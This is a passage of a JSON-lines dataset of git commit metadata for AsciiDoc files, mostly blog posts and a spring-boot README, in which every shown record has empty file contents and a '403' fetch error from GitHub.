/spring-boot,sankin\/spring-boot,mebinjacob\/spring-boot,kayelau\/spring-boot,ojacquemart\/spring-boot,na-na\/spring-boot,jbovet\/spring-boot,ydsakyclguozi\/spring-boot,mosen11\/spring-boot,aahlenst\/spring-boot,candrews\/spring-boot,vpavic\/spring-boot,pnambiarsf\/spring-boot,shangyi0102\/spring-boot,eliudiaz\/spring-boot,fogone\/spring-boot,lokbun\/spring-boot,donhuvy\/spring-boot,rweisleder\/spring-boot,ractive\/spring-boot,dnsw83\/spring-boo
t,qerub\/spring-boot,na-na\/spring-boot,Charkui\/spring-boot,Chomeh\/spring-boot,donhuvy\/spring-boot,jxblum\/spring-boot,yangdd1205\/spring-boot,artembilan\/spring-boot,clarklj001\/spring-boot,mlc0202\/spring-boot,durai145\/spring-boot,durai145\/spring-boot,xc145214\/spring-boot,eddumelendez\/spring-boot,vpavic\/spring-boot,mebinjacob\/spring-boot,drunklite\/spring-boot,nebhale\/spring-boot,qerub\/spring-boot,vandan16\/Vandan,ralenmandao\/spring-boot,krmcbride\/spring-boot,murilobr\/spring-boot,bbrouwer\/spring-boot,Makhlab\/spring-boot,neo4j-contrib\/spring-boot,scottfrederick\/spring-boot,bjornlindstrom\/spring-boot,gorcz\/spring-boot,jrrickard\/spring-boot,playleud\/spring-boot,lingounet\/spring-boot,philwebb\/spring-boot-concourse,forestqqqq\/spring-boot,jforge\/spring-boot,drumonii\/spring-boot,aahlenst\/spring-boot,npcode\/spring-boot,zhangshuangquan\/spring-root,nareshmiriyala\/spring-boot,jeremiahmarks\/spring-boot,mbnshankar\/spring-boot,christian-posta\/spring-boot,i007422\/jenkins2-course-spring-boot,smayoorans\/spring-boot,dreis2211\/spring-boot,prasenjit-net\/spring-boot,fjlopez\/spring-boot,AstaTus\/spring-boot,tbbost\/spring-boot,xiaoleiPENG\/my-project,ydsakyclguozi\/spring-boot,keithsjohnson\/spring-boot,dfa1\/spring-boot,lucassaldanha\/spring-boot,jforge\/spring-boot,rams2588\/spring-boot,dreis2211\/spring-boot,auvik\/spring-boot,isopov\/spring-boot,nandakishorm\/spring-boot,okba1\/spring-boot,eric-stanley\/spring-boot,mbrukman\/spring-boot,nebhale\/spring-boot,jack-luj\/spring-boot,mackeprm\/spring-boot,joshiste\/spring-boot,smilence1986\/spring-boot,lingounet\/spring-boot,xiaoleiPENG\/my-project,hello2009chen\/spring-boot,hello2009chen\/spring-boot,durai145\/spring-boot,candrews\/spring-boot,scottfrederick\/spring-boot,navarrogabriela\/spring-boot,huangyugui\/spring-boot,lokbun\/spring-boot,fjlopez\/spring-boot,rstirling\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,hklv\/spring-boot,Charkui\/spring-boot,bclozel\/spring-boot,end-user\/spring-boot,bclozel\/spring-boot,paweldolecinski\/spring-boot,durai145\/spring-boot,playleud\/spring-boot,sebastiankirsch\/spring-boot,NetoDevel\/spring-boot,mouadtk\/spring-boot,qerub\/spring-boot,sebastiankirsch\/spring-boot,ractive\/spring-boot,habuma\/spring-boot,donhuvy\/spring-boot,lokbun\/spring-boot,rickeysu\/spring-boot,joshthornhill\/spring-boot,meloncocoo\/spring-boot,paweldolecinski\/spring-boot,kiranbpatil\/spring-boot,bbrouwer\/spring-boot,yuxiaole\/spring-boot,jcastaldoFoodEssentials\/spring-boot,coolcao\/spring-boot,PraveenkumarShethe\/spring-boot,zorosteven\/spring-boot,crackien\/spring-boot,Makhlab\/spring-boot,huangyugui\/spring-boot,cmsandiga\/spring-boot,ralenmandao\/spring-boot,artembilan\/spring-boot,herau\/spring-boot,lucassaldanha\/spring-boot,na-na\/spring-boot,tan9\/spring-boot,johnktims\/spring-boot,M3lkior\/spring-boot,joshthornhill\/spring-boot,christian-posta\/spring-boot,eliudiaz\/spring-boot,xdweleven\/spring-boot,lcardito\/spring-boot,jeremiahmarks\/spring-boot,pvorb\/spring-boot,duandf35\/spring-boot,sungha\/spring-boot,lif123\/spring-boot,thomasdarimont\/spring-boot,vaseemahmed01\/spring-boot,orangesdk\/spring-boot,dreis2211\/spring-boot,jayarampradhan\/spring-boot,PraveenkumarShethe\/spring-boot,kdvolder\/spring-boot,paddymahoney\/spring-boot,zorosteven\/spring-boot,bsodzik\/spring-boot,jjankar\/spring-boot,10045125\/spring-boot,habuma\/spring-boot,joansmith\/spring-boot,bijukunjummen\/spring-boot,JiweiWong\/spring-boot,RishikeshDarandale\/spring-boot,RishikeshDarandale\/spring-boot,Pokbab\/spring
-boot,eonezhang\/spring-boot,kamilszymanski\/spring-boot,tan9\/spring-boot,felipeg48\/spring-boot,tsachev\/spring-boot,fireshort\/spring-boot,peteyan\/spring-boot,philwebb\/spring-boot,end-user\/spring-boot,fjlopez\/spring-boot,MasterRoots\/spring-boot,ihoneymon\/spring-boot,ydsakyclguozi\/spring-boot,sebastiankirsch\/spring-boot,olivergierke\/spring-boot,gorcz\/spring-boot,kamilszymanski\/spring-boot,srinivasan01\/spring-boot,mohican0607\/spring-boot,Chomeh\/spring-boot,qq83387856\/spring-boot,habuma\/spring-boot,keithsjohnson\/spring-boot,rams2588\/spring-boot,izeye\/spring-boot,jmnarloch\/spring-boot,meftaul\/spring-boot,srinivasan01\/spring-boot,PraveenkumarShethe\/spring-boot,rickeysu\/spring-boot,ChunPIG\/spring-boot,drunklite\/spring-boot,huangyugui\/spring-boot,SPNilsen\/spring-boot,paddymahoney\/spring-boot,ojacquemart\/spring-boot,existmaster\/spring-boot,navarrogabriela\/spring-boot,okba1\/spring-boot,satheeshmb\/spring-boot,sungha\/spring-boot,nelswadycki\/spring-boot,Charkui\/spring-boot,xiaoleiPENG\/my-project,artembilan\/spring-boot,prasenjit-net\/spring-boot,sbcoba\/spring-boot,johnktims\/spring-boot,simonnordberg\/spring-boot,JiweiWong\/spring-boot,SaravananParthasarathy\/SPSDemo,frost2014\/spring-boot,prasenjit-net\/spring-boot,marcellodesales\/spring-boot,damoyang\/spring-boot,vaseemahmed01\/spring-boot,deki\/spring-boot,sankin\/spring-boot,felipeg48\/spring-boot,herau\/spring-boot,ptahchiev\/spring-boot,yunbian\/spring-boot,drumonii\/spring-boot,christian-posta\/spring-boot,jorgepgjr\/spring-boot,na-na\/spring-boot,vakninr\/spring-boot,eric-stanley\/spring-boot,roberthafner\/spring-boot,Nowheresly\/spring-boot,dfa1\/spring-boot,mbenson\/spring-boot,Charkui\/spring-boot,qerub\/spring-boot,xc145214\/spring-boot,existmaster\/spring-boot,fogone\/spring-boot,jayarampradhan\/spring-boot,mrumpf\/spring-boot,yuxiaole\/spring-boot,marcellodesales\/spring-boot,forestqqqq\/spring-boot,lburgazzoli\/spring-boot,vandan16\/Vandan,axibase\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,ractive\/spring-boot,hehuabing\/spring-boot,RobertNickens\/spring-boot,ojacquemart\/spring-boot,domix\/spring-boot,hqrt\/jenkins2-course-spring-boot,rstirling\/spring-boot,nevenc-pivotal\/spring-boot,SaravananParthasarathy\/SPSDemo,ChunPIG\/spring-boot,hehuabing\/spring-boot,M3lkior\/spring-boot,jjankar\/spring-boot,sbuettner\/spring-boot,srikalyan\/spring-boot,mouadtk\/spring-boot,philwebb\/spring-boot,yuxiaole\/spring-boot,imranansari\/spring-boot,bbrouwer\/spring-boot,ptahchiev\/spring-boot,NetoDevel\/spring-boot,jorgepgjr\/spring-boot,bsodzik\/spring-boot,pnambiarsf\/spring-boot,JiweiWong\/spring-boot,prasenjit-net\/spring-boot,izestrea\/spring-boot,tiarebalbi\/spring-boot,eric-stanley\/spring-boot,brettwooldridge\/spring-boot,ApiSecRay\/spring-boot,wilkinsona\/spring-boot,liupd\/spring-boot,yangdd1205\/spring-boot,shakuzen\/spring-boot,sungha\/spring-boot,hklv\/spring-boot,minmay\/spring-boot,tiarebalbi\/spring-boot,NetoDevel\/spring-boot,lif123\/spring-boot,joshiste\/spring-boot,habuma\/spring-boot,mabernardo\/spring-boot,meftaul\/spring-boot,soul2zimate\/spring-boot,thomasdarimont\/spring-boot,AngusZhu\/spring-boot,playleud\/spring-boot,huangyugui\/spring-boot,nghiavo\/spring-boot,roberthafner\/spring-boot,smayoorans\/spring-boot,patrikbeno\/spring-boot,spring-projects\/spring-boot,mosoft521\/spring-boot,buobao\/spring-boot,RichardCSantana\/spring-boot,axibase\/spring-boot,DONIKAN\/spring-boot,izestrea\/spring-boot,crackien\/spring-boot,VitDevelop\/spring-boot,npcode\/spring-boot,simonnordberg\
/spring-boot,wilkinsona\/spring-boot,tsachev\/spring-boot,joshiste\/spring-boot,roberthafner\/spring-boot,raiamber1\/spring-boot,xdweleven\/spring-boot,qq83387856\/spring-boot,mdeinum\/spring-boot,neo4j-contrib\/spring-boot,tan9\/spring-boot,mrumpf\/spring-boot,patrikbeno\/spring-boot,Pokbab\/spring-boot,felipeg48\/spring-boot,nelswadycki\/spring-boot,ptahchiev\/spring-boot,neo4j-contrib\/spring-boot,satheeshmb\/spring-boot,htynkn\/spring-boot,yunbian\/spring-boot,nisuhw\/spring-boot,lexandro\/spring-boot,ilayaperumalg\/spring-boot,jbovet\/spring-boot,xialeizhou\/spring-boot,ptahchiev\/spring-boot,vaseemahmed01\/spring-boot,habuma\/spring-boot,balajinsr\/spring-boot,sankin\/spring-boot,ilayaperumalg\/spring-boot,domix\/spring-boot,lokbun\/spring-boot,trecloux\/spring-boot,kiranbpatil\/spring-boot,mohican0607\/spring-boot,tiarebalbi\/spring-boot,jrrickard\/spring-boot,orangesdk\/spring-boot,yhj630520\/spring-boot,aahlenst\/spring-boot,kiranbpatil\/spring-boot,mabernardo\/spring-boot,xingguang2013\/spring-boot,DONIKAN\/spring-boot,liupd\/spring-boot,nghiavo\/spring-boot,murilobr\/spring-boot,akmaharshi\/jenkins,ilayaperumalg\/spring-boot,ameraljovic\/spring-boot,trecloux\/spring-boot,xdweleven\/spring-boot,existmaster\/spring-boot,nghiavo\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,zorosteven\/spring-boot,snicoll\/spring-boot,mosen11\/spring-boot,nandakishorm\/spring-boot,fogone\/spring-boot,jxblum\/spring-boot,bsodzik\/spring-boot,olivergierke\/spring-boot,simonnordberg\/spring-boot,scottfrederick\/spring-boot,ydsakyclguozi\/spring-boot,wwadge\/spring-boot,wilkinsona\/spring-boot,vpavic\/spring-boot,kayelau\/spring-boot,jbovet\/spring-boot,okba1\/spring-boot,166yuan\/spring-boot,axibase\/spring-boot,soul2zimate\/spring-boot,clarklj001\/spring-boot,Makhlab\/spring-boot,tbadie\/spring-boot,jayeshmuralidharan\/spring-boot,AngusZhu\/spring-boot,cleverjava\/jenkins2-course-spring-boot,tan9\/spring-boot,bijukunjummen\/spring-boot,felipeg48\/spring-boot,sbuettner\/spring-boot,herau\/spring-boot,eonezhang\/spring-boot,mabernardo\/spring-boot,aahlenst\/spring-boot,yuxiaole\/spring-boot,mbogoevici\/spring-boot,npcode\/spring-boot,NetoDevel\/spring-boot,nandakishorm\/spring-boot,smilence1986\/spring-boot,meftaul\/spring-boot,166yuan\/spring-boot,lburgazzoli\/spring-boot,zhangshuangquan\/spring-root,ralenmandao\/spring-boot,mackeprm\/spring-boot,minmay\/spring-boot,bclozel\/spring-boot,mbenson\/spring-boot,DeezCashews\/spring-boot,izeye\/spring-boot,drunklite\/spring-boot,michael-simons\/spring-boot,gauravbrills\/spring-boot,izeye\/spring-boot,zorosteven\/spring-boot,smayoorans\/spring-boot,buobao\/spring-boot,cbtpro\/spring-boot,jack-luj\/spring-boot,bijukunjummen\/spring-boot,jvz\/spring-boot,trecloux\/spring-boot,rizwan18\/spring-boot,nghiavo\/spring-boot,gauravbrills\/spring-boot,rmoorman\/spring-boot,felipeg48\/spring-boot,VitDevelop\/spring-boot,166yuan\/spring-boot,AstaTus\/spring-boot,patrikbeno\/spring-boot,vakninr\/spring-boot,wilkinsona\/spring-boot,domix\/spring-boot,michael-simons\/spring-boot,zorosteven\/spring-boot,jayarampradhan\/spring-boot,murilobr\/spring-boot,auvik\/spring-boot,bsodzik\/spring-boot,sbcoba\/spring-boot,liupugong\/spring-boot,isopov\/spring-boot,eliudiaz\/spring-boot,qq83387856\/spring-boot,izestrea\/spring-boot,auvik\/spring-boot,paddymahoney\/spring-boot,donhuvy\/spring-boot,hello2009chen\/spring-boot,cleverjava\/jenkins2-course-spring-boot,jvz\/spring-boot,RichardCSantana\/spring-boot,nebhale\/spring-boot,jeremiahmarks\/spring-boot,snicoll\/spring-boot,lenic
liu\/spring-boot,smayoorans\/spring-boot,Nowheresly\/spring-boot,PraveenkumarShethe\/spring-boot,bclozel\/spring-boot,crackien\/spring-boot,akmaharshi\/jenkins,satheeshmb\/spring-boot,mosen11\/spring-boot,soul2zimate\/spring-boot,i007422\/jenkins2-course-spring-boot,aahlenst\/spring-boot,rweisleder\/spring-boot,rmoorman\/spring-boot,bclozel\/spring-boot,kdvolder\/spring-boot,krmcbride\/spring-boot,mbogoevici\/spring-boot,jcastaldoFoodEssentials\/spring-boot,zhanhb\/spring-boot,ollie314\/spring-boot,jayeshmuralidharan\/spring-boot,Buzzardo\/spring-boot,sankin\/spring-boot,ralenmandao\/spring-boot,zhanhb\/spring-boot,RishikeshDarandale\/spring-boot,lburgazzoli\/spring-boot,yangdd1205\/spring-boot,christian-posta\/spring-boot,MrMitchellMoore\/spring-boot,linead\/spring-boot,rstirling\/spring-boot,ollie314\/spring-boot,MrMitchellMoore\/spring-boot,lenicliu\/spring-boot,cmsandiga\/spring-boot,nurkiewicz\/spring-boot,mosen11\/spring-boot,chrylis\/spring-boot,eric-stanley\/spring-boot,balajinsr\/spring-boot,christian-posta\/spring-boot,frost2014\/spring-boot,mlc0202\/spring-boot,fireshort\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,RishikeshDarandale\/spring-boot,lexandro\/spring-boot,huangyugui\/spring-boot,coolcao\/spring-boot,imranansari\/spring-boot,prasenjit-net\/spring-boot,Buzzardo\/spring-boot,joshiste\/spring-boot,nevenc-pivotal\/spring-boot,MrMitchellMoore\/spring-boot,rweisleder\/spring-boot,srikalyan\/spring-boot,brettwooldridge\/spring-boot,Pokbab\/spring-boot,MrMitchellMoore\/spring-boot,RichardCSantana\/spring-boot,philwebb\/spring-boot-concourse,spring-projects\/spring-boot,sungha\/spring-boot,rweisleder\/spring-boot,tan9\/spring-boot,mohican0607\/spring-boot,prakashme\/spring-boot,srikalyan\/spring-boot,ameraljovic\/spring-boot,yhj630520\/spring-boot,DeezCashews\/spring-boot,forestqqqq\/spring-boot,mdeinum\/spring-boot,liupd\/spring-boot,orangesdk\/spring-boot,nghiavo\/spring-boot,RichardCSantana\/spring-boot,Pokbab\/spring-boot,M3lkior\/spring-boot,deki\/spring-boot,Xaerxess\/spring-boot,mbogoevici\/spring-boot,yhj630520\/spring-boot,panbiping\/spring-boot,rizwan18\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,joshthornhill\/spring-boot,playleud\/spring-boot,candrews\/spring-boot,bclozel\/spring-boot,hehuabing\/spring-boot,roymanish\/spring-boot,master-slave\/spring-boot,fulvio-m\/spring-boot,xc145214\/spring-boot,rams2588\/spring-boot,olivergierke\/spring-boot,neo4j-contrib\/spring-boot,durai145\/spring-boot,drumonii\/spring-boot,gauravbrills\/spring-boot,allyjunio\/spring-boot,mlc0202\/spring-boot,dnsw83\/spring-boot,yhj630520\/spring-boot,dfa1\/spring-boot,nghialunhaiha\/spring-boot,krmcbride\/spring-boot,SPNilsen\/spring-boot,master-slave\/spring-boot,mbnshankar\/spring-boot,royclarkson\/spring-boot,javyzheng\/spring-boot,mbrukman\/spring-boot,thomasdarimont\/spring-boot,okba1\/spring-boot,tbadie\/spring-boot,nareshmiriyala\/spring-boot,peteyan\/spring-boot,xingguang2013\/spring-boot,rweisleder\/spring-boot,kamilszymanski\/spring-boot,damoyang\/spring-boot,eonezhang\/spring-boot,navarrogabriela\/spring-boot,hklv\/spring-boot,keithsjohnson\/spring-boot,RainPlanter\/spring-boot,hehuabing\/spring-boot,mabernardo\/spring-boot,dreis2211\/spring-boot,liupugong\/spring-boot,npcode\/spring-boot,murilobr\/spring-boot,ptahchiev\/spring-boot,javyzheng\/spring-boot,jbovet\/spring-boot,rickeysu\/spring-boot,joshiste\/spring-boot,michael-simons\/spring-boot,peteyan\/spring-boot,marcellodesales\/spring-boot,ihoneymon\/spring-boot,joansmith\/spring-boot,DeezCashews\/s
pring-boot,royclarkson\/spring-boot,lburgazzoli\/spring-boot,scottfrederick\/spring-boot,prakashme\/spring-boot,nisuhw\/spring-boot,Xaerxess\/spring-boot,playleud\/spring-boot,nelswadycki\/spring-boot,nevenc-pivotal\/spring-boot,eonezhang\/spring-boot,htynkn\/spring-boot,mike-kukla\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,chrylis\/spring-boot,ralenmandao\/spring-boot,balajinsr\/spring-boot,mackeprm\/spring-boot,xdweleven\/spring-boot,meloncocoo\/spring-boot,linead\/spring-boot,tbbost\/spring-boot,kdvolder\/spring-boot,xwjxwj30abc\/spring-boot,pvorb\/spring-boot,ChunPIG\/spring-boot,simonnordberg\/spring-boot,jcastaldoFoodEssentials\/spring-boot,michael-simons\/spring-boot,shakuzen\/spring-boot,RainPlanter\/spring-boot,wwadge\/spring-boot,htynkn\/spring-boot,pvorb\/spring-boot,gorcz\/spring-boot,ameraljovic\/spring-boot,SPNilsen\/spring-boot,ydsakyclguozi\/spring-boot,mouadtk\/spring-boot,npcode\/spring-boot,paddymahoney\/spring-boot,sebastiankirsch\/spring-boot,brettwooldridge\/spring-boot,fogone\/spring-boot,tiarebalbi\/spring-boot,jack-luj\/spring-boot,duandf35\/spring-boot,ractive\/spring-boot,afroje-reshma\/spring-boot-sample,michael-simons\/spring-boot,lucassaldanha\/spring-boot,shakuzen\/spring-boot,ApiSecRay\/spring-boot,spring-projects\/spring-boot,MasterRoots\/spring-boot,SaravananParthasarathy\/SPSDemo,xwjxwj30abc\/spring-boot,mbogoevici\/spring-boot,isopov\/spring-boot,srikalyan\/spring-boot,fireshort\/spring-boot,designreuse\/spring-boot,SPNilsen\/spring-boot,chrylis\/spring-boot,mosoft521\/spring-boot,ChunPIG\/spring-boot,paweldolecinski\/spring-boot,VitDevelop\/spring-boot,zhanhb\/spring-boot,cbtpro\/spring-boot,tbbost\/spring-boot,allyjunio\/spring-boot,lif123\/spring-boot,dreis2211\/spring-boot,candrews\/spring-boot,jforge\/spring-boot,peteyan\/spring-boot,patrikbeno\/spring-boot,shangyi0102\/spring-boot,roberthafner\/spring-boot,tsachev\/spring-boot,designreuse\/spring-boot,coolcao\/spring-boot,philwebb\/spring-boot,thomasdarimont\/spring-boot,trecloux\/spring-boot,mbrukman\/spring-boot,donthadineshkumar\/spring-boot,gauravbrills\/spring-boot,auvik\/spring-boot,chrylis\/spring-boot,10045125\/spring-boot,ihoneymon\/spring-boot,jrrickard\/spring-boot,donhuvy\/spring-boot,MasterRoots\/spring-boot,eddumelendez\/spring-boot,lokbun\/spring-boot,roymanish\/spring-boot,felipeg48\/spring-boot,sankin\/spring-boot,jforge\/spring-boot,isopov\/spring-boot,deki\/spring-boot,patrikbeno\/spring-boot,end-user\/spring-boot,RainPlanter\/spring-boot,jcastaldoFoodEssentials\/spring-boot,jmnarloch\/spring-boot,ApiSecRay\/spring-boot,xiaoleiPENG\/my-project,Xaerxess\/spring-boot,meftaul\/spring-boot,rizwan18\/spring-boot,jmnarloch\/spring-boot,allyjunio\/spring-boot,cbtpro\/spring-boot,panbiping\/spring-boot,mbenson\/spring-boot,axibase\/spring-boot,aahlenst\/spring-boot,forestqqqq\/spring-boot,drumonii\/spring-boot,clarklj001\/spring-boot,okba1\/spring-boot,rizwan18\/spring-boot,fogone\/spring-boot,ChunPIG\/spring-boot,zhangshuangquan\/spring-root,chrylis\/spring-boot,meloncocoo\/spring-boot,raiamber1\/spring-boot,Makhlab\/spring-boot,jack-luj\/spring-boot,jayeshmuralidharan\/spring-boot,sbcoba\/spring-boot,soul2zimate\/spring-boot,tsachev\/spring-boot,nelswadycki\/spring-boot,kayelau\/spring-boot,neo4j-contrib\/spring-boot,meloncocoo\/spring-boot,AngusZhu\/spring-boot,xialeizhou\/spring-boot,jxblum\/spring-boot,nurkiewicz\/spring-boot,scottfrederick\/spring-boot,Xaerxess\/spring-boot,ractive\/spring-boot,fireshort\/spring-boot,hqrt\/jenkins2-course-spring-boot,ihoneymon\/spring-
boot,hqrt\/jenkins2-course-spring-boot,cbtpro\/spring-boot,shangyi0102\/spring-boot,fulvio-m\/spring-boot,tiarebalbi\/spring-boot,ojacquemart\/spring-boot,eliudiaz\/spring-boot,ameraljovic\/spring-boot,fulvio-m\/spring-boot,xialeizhou\/spring-boot,shakuzen\/spring-boot,minmay\/spring-boot,fjlopez\/spring-boot,i007422\/jenkins2-course-spring-boot,cleverjava\/jenkins2-course-spring-boot,xc145214\/spring-boot,allyjunio\/spring-boot,buobao\/spring-boot,nebhale\/spring-boot,ollie314\/spring-boot,nebhale\/spring-boot,jvz\/spring-boot,spring-projects\/spring-boot,AstaTus\/spring-boot,frost2014\/spring-boot,lburgazzoli\/spring-boot,bijukunjummen\/spring-boot,smayoorans\/spring-boot,eonezhang\/spring-boot,allyjunio\/spring-boot,nghialunhaiha\/spring-boot,5zzang\/spring-boot,sbcoba\/spring-boot,Nowheresly\/spring-boot,liupd\/spring-boot,tiarebalbi\/spring-boot,donthadineshkumar\/spring-boot,lexandro\/spring-boot,rickeysu\/spring-boot,vaseemahmed01\/spring-boot,MrMitchellMoore\/spring-boot,dnsw83\/spring-boot,wwadge\/spring-boot,designreuse\/spring-boot,DONIKAN\/spring-boot,mosoft521\/spring-boot,jxblum\/spring-boot,RobertNickens\/spring-boot,master-slave\/spring-boot,ihoneymon\/spring-boot,hehuabing\/spring-boot,lenicliu\/spring-boot,mike-kukla\/spring-boot","old_file":"spring-boot-starters\/README.adoc","new_file":"spring-boot-starters\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/soul2zimate\/spring-boot.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e0d9dc2fd13e171cbecdbf17230349ca8d6e31b8","subject":"Update 2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","message":"Update 2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_file":"_posts\/2016-03-28-AsciiDoc-to-GitHub-Pages-with-Travis-CI-and-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"abe88d2e16ccc849dcbc8d89ada14d9b0f785174","subject":"Update 2015-06-18-hello-word.adoc","message":"Update 2015-06-18-hello-word.adoc","repos":"miplayer1\/miplayer1.github.io,miplayer1\/miplayer1.github.io,miplayer1\/miplayer1.github.io","old_file":"_posts\/2015-06-18-hello-word.adoc","new_file":"_posts\/2015-06-18-hello-word.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/miplayer1\/miplayer1.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a064af427e716c93f0af0c80cf28cb525087361e","subject":"Update 2016-04-04-Sin-espias.adoc","message":"Update 2016-04-04-Sin-espias.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-04-Sin-espias.adoc","new_file":"_posts\/2016-04-04-Sin-espias.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"154fc1e08b8c0da4cf8ac9411c409cf38a724b60","subject":"Update 2016-07-16-Blog-Title.adoc","message":"Update 
2016-07-16-Blog-Title.adoc","repos":"hiun\/hubpress.io,hiun\/hubpress.io,hiun\/hubpress.io,hiun\/hubpress.io","old_file":"_posts\/2016-07-16-Blog-Title.adoc","new_file":"_posts\/2016-07-16-Blog-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hiun\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1c9e8db3f25fb1c11f06acd2099fcff81f8d741c","subject":"put GEP-1 page from codehaus into website","message":"put GEP-1 page from codehaus into website\n","repos":"groovy\/groovy-website,groovy\/groovy-website","old_file":"site\/src\/site\/wiki\/GEP-1.adoc","new_file":"site\/src\/site\/wiki\/GEP-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/groovy\/groovy-website.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ef4c63c4e6a389f4eb65a8a4ebe98a63186f1e0e","subject":"Add tip for GUI components with Vaadin 8 (#8899)","message":"Add tip for GUI components with Vaadin 8 (#8899)\n\n* Use difference GUI component for Vaadin 8 \n\nWith Vaadin Framework 8, Tutorial learner should use different setting and component for form development\n\n* Better explanation\n","repos":"peterl1084\/framework,kironapublic\/vaadin,Darsstar\/framework,mstahv\/framework,Darsstar\/framework,asashour\/framework,mstahv\/framework,asashour\/framework,mstahv\/framework,kironapublic\/vaadin,asashour\/framework,kironapublic\/vaadin,peterl1084\/framework,kironapublic\/vaadin,peterl1084\/framework,mstahv\/framework,peterl1084\/framework,mstahv\/framework,Darsstar\/framework,asashour\/framework,peterl1084\/framework,kironapublic\/vaadin,Darsstar\/framework,asashour\/framework,Darsstar\/framework","old_file":"documentation\/tutorial.adoc","new_file":"documentation\/tutorial.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/peterl1084\/framework.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5522e7ac418ff37a90fb99319a5ae3276a4ec353","subject":"Update 2015-07-10-La-Musique-1-Le-Metal.adoc","message":"Update 2015-07-10-La-Musique-1-Le-Metal.adoc","repos":"TeksInHelsinki\/TeksInHelsinki.github.io,TeksInHelsinki\/TeksInHelsinki.github.io,TeksInHelsinki\/TeksInHelsinki.github.io","old_file":"_posts\/2015-07-10-La-Musique-1-Le-Metal.adoc","new_file":"_posts\/2015-07-10-La-Musique-1-Le-Metal.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TeksInHelsinki\/TeksInHelsinki.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"461440ed19a9dd2fe350de279f2b71117d7aae56","subject":"Update 2017-02-20-Sala-de-Chat-Privado2.adoc","message":"Update 2017-02-20-Sala-de-Chat-Privado2.adoc","repos":"txemis\/txemis.github.io,txemis\/txemis.github.io,txemis\/txemis.github.io,txemis\/txemis.github.io,txemis\/txemis.github.io","old_file":"_posts\/2017-02-20-Sala-de-Chat-Privado2.adoc","new_file":"_posts\/2017-02-20-Sala-de-Chat-Privado2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/txemis\/txemis.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b94315484cddab482f3f50e4e3e9e1654d802dec","subject":"Update 2017-04-10-3-D-printer-is-coming.adoc","message":"Update 
2017-04-10-3-D-printer-is-coming.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-10-3-D-printer-is-coming.adoc","new_file":"_posts\/2017-04-10-3-D-printer-is-coming.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a43e08ae75ce3cc4305843f88bce1a043b256b53","subject":"pequenas corre\u00e7\u00f5es de portugu\u00eas","message":"pequenas corre\u00e7\u00f5es de portugu\u00eas","repos":"minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io","old_file":"_posts\/2017-07-13-Como-pensar-em-Prolog.adoc","new_file":"_posts\/2017-07-13-Como-pensar-em-Prolog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/minicz\/minicz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1677ceb5a1b75142970635e6e4f8167f7dd90ce8","subject":"Update 2017-09-30-Matrix-Layer-Rotation.adoc","message":"Update 2017-09-30-Matrix-Layer-Rotation.adoc","repos":"JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io,JithinPavithran\/JithinPavithran.github.io","old_file":"_posts\/2017-09-30-Matrix-Layer-Rotation.adoc","new_file":"_posts\/2017-09-30-Matrix-Layer-Rotation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/JithinPavithran\/JithinPavithran.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0ae56c66cfa07fee76209d704f5c3e958b27525a","subject":"Sample 